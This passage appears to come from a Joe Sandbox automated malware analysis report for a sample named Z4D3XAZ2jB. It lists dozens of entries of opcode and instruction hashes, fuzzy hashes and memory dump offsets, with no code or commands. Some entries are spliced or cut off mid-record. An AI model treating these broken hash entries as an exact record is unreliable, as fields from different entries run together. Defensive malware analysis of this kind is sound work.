                                                                                                                                • Opcode ID: 7b2e6d26c5be4ec1f3699673129144a44c6dfb7be9ad228e4879e4b9063c971e
                                                                                                                                • Instruction ID: 498c6a29a2bc79b0baf08986b441bdc52745115786dcdb38202ebb18b56dd4df
                                                                                                                                • Opcode Fuzzy Hash: 7b2e6d26c5be4ec1f3699673129144a44c6dfb7be9ad228e4879e4b9063c971e
                                                                                                                                • Instruction Fuzzy Hash: 53D1E2306195598FEB6DCF48C0E05B837A5FF45301B5152BDC84B8B69ADA3AF9C2CB80

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 29a2fee28501c447c03c8271cb859b1c9b04de59a519a6fb859c2d758ca5b52a
                                                                                                                                • Instruction ID: c8690b5793c53473bd945220d3a11662c3069eee569107664cec330449108bfb
                                                                                                                                • Opcode Fuzzy Hash: 29a2fee28501c447c03c8271cb859b1c9b04de59a519a6fb859c2d758ca5b52a
                                                                                                                                • Instruction Fuzzy Hash: 5141E163F4E15B9AF23862E834718FC37895F54360F0A01B6F46E860E7BD0E3A8506C9

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dac1be74f3c99331b02b112086acd548a16def7ac5d97659605ab3a6297d628a
                                                                                                                                • Instruction ID: 399774802fbfb6e5f96879031a8178f37df6bfcdea665a9efb6b111cb421b510
                                                                                                                                • Opcode Fuzzy Hash: dac1be74f3c99331b02b112086acd548a16def7ac5d97659605ab3a6297d628a
                                                                                                                                • Instruction Fuzzy Hash: B2C1F034B0EA4A8FE758DB68C0A46A4B7E4FF44300F5541B9C04FC7AA6CB2AF951C780

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35e75d94a0d4244ebe710bec3cb6bff63ead93c7810c8d86c2984105d8f126f8
                                                                                                                                • Instruction ID: ebb2adf4c2b4a0bb9917eb5a743263879e14b3c2266de04f740e999348219715
                                                                                                                                • Opcode Fuzzy Hash: 35e75d94a0d4244ebe710bec3cb6bff63ead93c7810c8d86c2984105d8f126f8
                                                                                                                                • Instruction Fuzzy Hash: 67310862F0E19B5AF33966F824719F83B495F51760B0A02B7E4AD450F3AC0E3A4547CA

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d9c36a4d116bf3b45e4c7327bd4e7db8c84818d10043fc69363f6be4a960ea33
                                                                                                                                • Instruction ID: 8556123f2171ea6756af621f9944ea6bf44e87bd4e45033620ef689fe77cb107
                                                                                                                                • Opcode Fuzzy Hash: d9c36a4d116bf3b45e4c7327bd4e7db8c84818d10043fc69363f6be4a960ea33
                                                                                                                                • Instruction Fuzzy Hash: 8EC1F03061955A8FEB2DCF48C0E05B937A5FF45301B5156BDC88B8B69BDA3AF981CB40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e5e8424ec811187ddb070af849bc8765942b17e16bc2b5740cedc79c1451ab97
                                                                                                                                • Instruction ID: c3ef483849f6c98ad823d14fd886d66c45d5b05d3c0b89aabd055a6e4a15fab3
                                                                                                                                • Opcode Fuzzy Hash: e5e8424ec811187ddb070af849bc8765942b17e16bc2b5740cedc79c1451ab97
                                                                                                                                • Instruction Fuzzy Hash: 86C10530B1DA4A8FE759DBA8C0A06B4B7A5FF54300F55417DC04EC7A9ACB2AF951CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8313895ffc35bfa77522903f198bf9d4adabd8bd2613da86d1224e47449f219d
                                                                                                                                • Instruction ID: ef6522c2860ffccac063dff8c0931d1c2759aed36d59fef709f966ba31c7d33f
                                                                                                                                • Opcode Fuzzy Hash: 8313895ffc35bfa77522903f198bf9d4adabd8bd2613da86d1224e47449f219d
                                                                                                                                • Instruction Fuzzy Hash: C3A10271B1A94E8FE768DBA884627ACB7E5FF45700F450179D05EC72A3DE297D028780
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6354365982c0c8b05ab3ab119d5e14765ecfb2450242e25da375143256a39e26
                                                                                                                                • Instruction ID: 59bc2d3131eefa042d884ec121610ca66937e2d9c7c21cb3c6aefa01f991dddc
                                                                                                                                • Opcode Fuzzy Hash: 6354365982c0c8b05ab3ab119d5e14765ecfb2450242e25da375143256a39e26
                                                                                                                                • Instruction Fuzzy Hash: DD41443260C9488FDF9CEF68C4A6EA573E5FBA9314704026AE04EC7192DE25FD45CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3ebc941aa87a73ab0f8395341ed4bc6675f7e0b0be1dcc0f6141309da467a64d
                                                                                                                                • Instruction ID: 5d47220dba368a33092b141974effbdc76839165fe1b38cfa0ad31fa1553fb71
                                                                                                                                • Opcode Fuzzy Hash: 3ebc941aa87a73ab0f8395341ed4bc6675f7e0b0be1dcc0f6141309da467a64d
                                                                                                                                • Instruction Fuzzy Hash: 9041523160C9098FDF9DEF18C4A5EA9B3E1FBA9315B1501AAD05EC3292DE25E845CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 101e71456ec176bec81e3f0f8e7228ba40d3dde885a2653987e156cfcbcb0521
                                                                                                                                • Instruction ID: d764e7743838f22b4df20bdf331c9e9a1602ab420745b2fbad50da109ae42fff
                                                                                                                                • Opcode Fuzzy Hash: 101e71456ec176bec81e3f0f8e7228ba40d3dde885a2653987e156cfcbcb0521
                                                                                                                                • Instruction Fuzzy Hash: FF51A770E09A2C8EEBA4DF18C894BE9B7B5EB58305F1042EAD00DE2264DF755AC4CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cfc4203265488afc2e2b91c20d4a773a9e01dda448485288c3d4e0879c776e0f
                                                                                                                                • Instruction ID: 4334c2558e6d77fca12fd4bcd0061dbc3a369707814f574cbf31fb2ea6871725
                                                                                                                                • Opcode Fuzzy Hash: cfc4203265488afc2e2b91c20d4a773a9e01dda448485288c3d4e0879c776e0f
                                                                                                                                • Instruction Fuzzy Hash: 0831323160CA488FDF9CEF28C4A6E6577E1FBA931470402AAE05EC7192DE25FD45CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8efcaf4dd77ba179deb7227830b0c8e424e1c84ed28e0048455610c0d172b0ea
                                                                                                                                • Instruction ID: b30481d390a3c9dbccf4823ee615174eeeb66f9b813a5d3d4cccfe49c73ed842
                                                                                                                                • Opcode Fuzzy Hash: 8efcaf4dd77ba179deb7227830b0c8e424e1c84ed28e0048455610c0d172b0ea
                                                                                                                                • Instruction Fuzzy Hash: 7031903160C9488FDB9DEF1CC4A5E64B3E1FBA931471502AAD05EC72A2DE29FC45CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a2d3ebb166843459310649d5b712f9874e149fb871deec9250d025123533a5e
                                                                                                                                • Instruction ID: adedb7e074c72e633fc8c997770d5b1fa848a681338f148b95e1b886fb3325c7
                                                                                                                                • Opcode Fuzzy Hash: 8a2d3ebb166843459310649d5b712f9874e149fb871deec9250d025123533a5e
                                                                                                                                • Instruction Fuzzy Hash: 5531543160C9498FDF9CEF28C4A6EA573E1FBA931470402AAE04FC7192DE25F945CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0e1066cb310b7e6211d7d693509e4de003e9c1568085caed93a2285a856136b7
                                                                                                                                • Instruction ID: 57ab818521dbd88aac44532ef77344357876f0d2d27abc8afb7fc92118fd737c
                                                                                                                                • Opcode Fuzzy Hash: 0e1066cb310b7e6211d7d693509e4de003e9c1568085caed93a2285a856136b7
                                                                                                                                • Instruction Fuzzy Hash: 3A31843160C9098FDF9DEF18C4A5EA5B3E1FBA831471501AAD05EC72A2DE29FC45CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8dbe5375aa83dd10be5fd64aa31a60da9e0884254d3a01255fdcc1a261cd7282
                                                                                                                                • Instruction ID: 2bf7712f5f191c9a836118c69d73c2a23d38dab4b41d54f1ed99c2f289b37737
                                                                                                                                • Opcode Fuzzy Hash: 8dbe5375aa83dd10be5fd64aa31a60da9e0884254d3a01255fdcc1a261cd7282
                                                                                                                                • Instruction Fuzzy Hash: 48411C30E14A1D8FDB94EF98C494AEDB7F1FF58305F11027AE419E32A5CA34A941CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46cb9d73292a6cce5b0dfdcca4bd9a5da52c38b16df986cf4d648c8e9f71fd9a
                                                                                                                                • Instruction ID: dbe9ef579780b83bb91a2b551a472189e03855dc668c154ee5b8ce8582638db6
                                                                                                                                • Opcode Fuzzy Hash: 46cb9d73292a6cce5b0dfdcca4bd9a5da52c38b16df986cf4d648c8e9f71fd9a
                                                                                                                                • Instruction Fuzzy Hash: 92312230349A0A4FE764DB68E4A56E9B7D4FF41324F10057EC84AC7AE2CB6AE5428780
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: db50baf700a2185e6ccc008b2f5440b6a7f9046e51b9651dfc9ee2dddaa1c515
                                                                                                                                • Instruction ID: 1968e6822d7399f50b1be39ebe6fc90e370cb1c54ff8b18cfb641126ecdbc327
                                                                                                                                • Opcode Fuzzy Hash: db50baf700a2185e6ccc008b2f5440b6a7f9046e51b9651dfc9ee2dddaa1c515
                                                                                                                                • Instruction Fuzzy Hash: D8318131B1990E8FDB58DB98C4A1668B7E6FF89314B514139D01EC3692DB26BC12CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: eb037706de0efc84bb5d6e6dca83b81aad23a46df8bab7309702d52aee62c071
                                                                                                                                • Instruction ID: e672e07548899b1fe5e6f197802bbc5b76ea2c833a6cd777c82b098d3d97b976
                                                                                                                                • Opcode Fuzzy Hash: eb037706de0efc84bb5d6e6dca83b81aad23a46df8bab7309702d52aee62c071
                                                                                                                                • Instruction Fuzzy Hash: DC314D34E0A54EDFDBA8DBA484A56BD77BAFF44300F510176E10FD61A1DA3A6A408741
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff364e0c9a0a25884a3f2f12322d892ecd61a032f43f29d2fb175ab352ed0b73
                                                                                                                                • Instruction ID: 3d0689e96c0adab9631b6c598c838849e972f219137995ede123a2aa4f317b71
                                                                                                                                • Opcode Fuzzy Hash: ff364e0c9a0a25884a3f2f12322d892ecd61a032f43f29d2fb175ab352ed0b73
                                                                                                                                • Instruction Fuzzy Hash: 9E315E20A1E5DE4EE77AD758447857D7B59EF82301B1946BAD08ACB0E7C81FBAC18341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b3d4df841840e94da110c8f908b542872f05b992a53b76c3c8f02baf9d3669a4
                                                                                                                                • Instruction ID: 23f1438e25228c22abb481615d9498488db7f78070f3cd5908cffa3d016507a5
                                                                                                                                • Opcode Fuzzy Hash: b3d4df841840e94da110c8f908b542872f05b992a53b76c3c8f02baf9d3669a4
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 873bf08b485836f2e432db19f704bb5f76d73d98a337c89299a439434f842012
                                                                                                                                • Instruction ID: 356643903b2ef2c1c4b0880b136e70573efbc8e2a0ada12359b906c0e5495bd7
                                                                                                                                • Opcode Fuzzy Hash: 873bf08b485836f2e432db19f704bb5f76d73d98a337c89299a439434f842012
                                                                                                                                • Instruction Fuzzy Hash: 7511A175A0E39A8ED702ABA4C8246E97B60EF42311F0946BAC4558B1E3CA382619C752
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6443aaf2765c53f6d92904035f8b351c3a488356c117b367e3779801d8da6cef
                                                                                                                                • Instruction ID: 26d5f9bfcb751c475bcb31d149d76b48e9f6250465257e0a20a987546613ff5d
                                                                                                                                • Opcode Fuzzy Hash: 6443aaf2765c53f6d92904035f8b351c3a488356c117b367e3779801d8da6cef
                                                                                                                                • Instruction Fuzzy Hash: 73014B31B1891D9FD768E69CE0616BCB391FF49720B55417AD01EC3292CA24BC52C7C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b4b33c2e97411cc2c8a1d4c4df35023702c708060f48a6050e97e1514d97f81
                                                                                                                                • Instruction ID: da156f7931247425dcdab0df7c03ed6ba6535a0cc9c49f04c96371a98937e56f
                                                                                                                                • Opcode Fuzzy Hash: 2b4b33c2e97411cc2c8a1d4c4df35023702c708060f48a6050e97e1514d97f81
                                                                                                                                • Instruction Fuzzy Hash: F3016D3090894CCFCF98EF58C855FD877B5EBA8315F0401AAD00DE72A1DA32AAC0CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 66e467b4b79b35296c725460dd78eeaf049c8faf9663eb333abcfb5dd6e1fd85
                                                                                                                                • Instruction ID: dce386e4d1b09b4aec033480ec91e8e7ed70d091302b5671e984c11ccfe1ce48
                                                                                                                                • Opcode Fuzzy Hash: 66e467b4b79b35296c725460dd78eeaf049c8faf9663eb333abcfb5dd6e1fd85
                                                                                                                                • Instruction Fuzzy Hash: 1D01FB3190894CCFCF98EF58C859FD877B1EBA8315F1401AAD40DE72A1DA36AAC5CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 37185683fd683b51c983057079bf1b48ac7488930a2aab17d54e020dff94018e
                                                                                                                                • Instruction ID: dbf42075e8d6659295a7d1c979720c05bc59a817622a1bca565913b80a77bcdf
                                                                                                                                • Opcode Fuzzy Hash: 37185683fd683b51c983057079bf1b48ac7488930a2aab17d54e020dff94018e
                                                                                                                                • Instruction Fuzzy Hash: 80F0623154F2CA9FD7268BB088618E63FB8EF43314B1900F6D085C70B2E66E5B4AC761
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56417f8788fc6a51959693b646c50803ca6a9504b08a04903c3cda63a7c179f1
                                                                                                                                • Instruction ID: c581124cddc6ad6fb7fdb51560b517f73c0d50c7445740689f6635d0229fe230
                                                                                                                                • Opcode Fuzzy Hash: 56417f8788fc6a51959693b646c50803ca6a9504b08a04903c3cda63a7c179f1
                                                                                                                                • Instruction Fuzzy Hash: 8F019274E0E3DA8ED7029BA488246ED7B61EF06310F0946F6C4158B1E7CE382604C756
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 75f56dec7a40dcf764e45974c9879000b5c47209fb68cd376a9667496cdf6a62
                                                                                                                                • Instruction ID: 44933483f93d06c00d0727f726a65546e83ecfcf19da08c4dd53423960d31457
                                                                                                                                • Opcode Fuzzy Hash: 75f56dec7a40dcf764e45974c9879000b5c47209fb68cd376a9667496cdf6a62
                                                                                                                                • Instruction Fuzzy Hash: 68F0FF75F1D55E8FEF64DA84C4215FE77B5FF48341F110639D10AE21A0EE2A26508B50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 411b3edc4ec16d0c008fe9324e2a3e68cf1fc8912906b536e13e1e57aef65194
                                                                                                                                • Instruction ID: 76008321b425bc158db621a93904180c808618d39c773fd9f55f7bd2dac61d0b
                                                                                                                                • Opcode Fuzzy Hash: 411b3edc4ec16d0c008fe9324e2a3e68cf1fc8912906b536e13e1e57aef65194
                                                                                                                                • Instruction Fuzzy Hash: 1FF01D30A15A0E9FDB54EF9894996EE77A0FB54301F110536E41CC21A4DA3466A49B81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a76a76986759a5c3fcad6ba10a36a7c2c5f817ca8ac038c1ce410f1a09abc2c3
                                                                                                                                • Instruction ID: 1e79ffc1828025d321018831cebaacca78ae53fcc7dbd7883e1c2e416e238f56
                                                                                                                                • Opcode Fuzzy Hash: a76a76986759a5c3fcad6ba10a36a7c2c5f817ca8ac038c1ce410f1a09abc2c3
                                                                                                                                • Instruction Fuzzy Hash: 2AF08230D15A0D9FDB50EF94D4486EE77E0FF14301F000526E81CC3164CA30A6A4DB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction ID: 60ba6c0cc5a147f0d42477483d52dd84093247267ad0b59902eaae7a4a44ef8e
                                                                                                                                • Opcode Fuzzy Hash: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction Fuzzy Hash: 7CC0122030E414DFD2A1DB68C414B3A3AA8EF05740B1201A1F009CB1B2C51ADD00CB10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction ID: c52d5ae55279361e3e9eb70b13be3883f4b5883775045d9be8eee0c4a67f7de1
                                                                                                                                • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction Fuzzy Hash: CBD0C92CB0F90F86F27946D160B823A61DC5F40300E62443ED46F429E1CF1FB7016601
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
